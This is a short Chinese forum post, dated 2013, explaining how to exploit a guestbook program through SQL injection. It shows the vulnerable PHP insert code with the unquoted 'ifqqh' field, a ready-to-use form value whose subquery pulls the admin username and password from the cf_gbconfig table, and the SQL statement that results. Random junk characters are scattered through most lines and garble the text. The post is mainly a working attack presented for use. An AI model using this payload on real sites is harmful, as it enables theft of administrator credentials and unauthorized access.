留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。, r, ^& c# b; N' I2 A, K v
0 e5 L$ D0 Z2 x' S$ y; I$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
) ~. Q2 ~' Z! v$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响& v0 w4 _8 X3 _
7 J& X8 z+ l" I( X2 b提交的时候把ifqqh的值改一下。变成9 @. j1 c. C. T2 i0 F
0 I7 M V) M& c& h( ^/ s<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
& a% Q% C: \; u3 j( O; b4 S$ d; v# `; b8 d
这样SQL插入语句就变了.- f' Y9 g/ @6 K
2 M. ?5 K5 z8 [ @( K. m4 ainsert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
+ Z, K9 ^ P* E
( N7 }5 w% S, s, e5 J构造了另外一句SQL。并且把帐号密码读出来。
: w" L& G8 ?- C( h" R6 k: D" n* l; o" s5 ^1 N
|
发表于 2013-2-19 08:10:11
收藏
支持
反对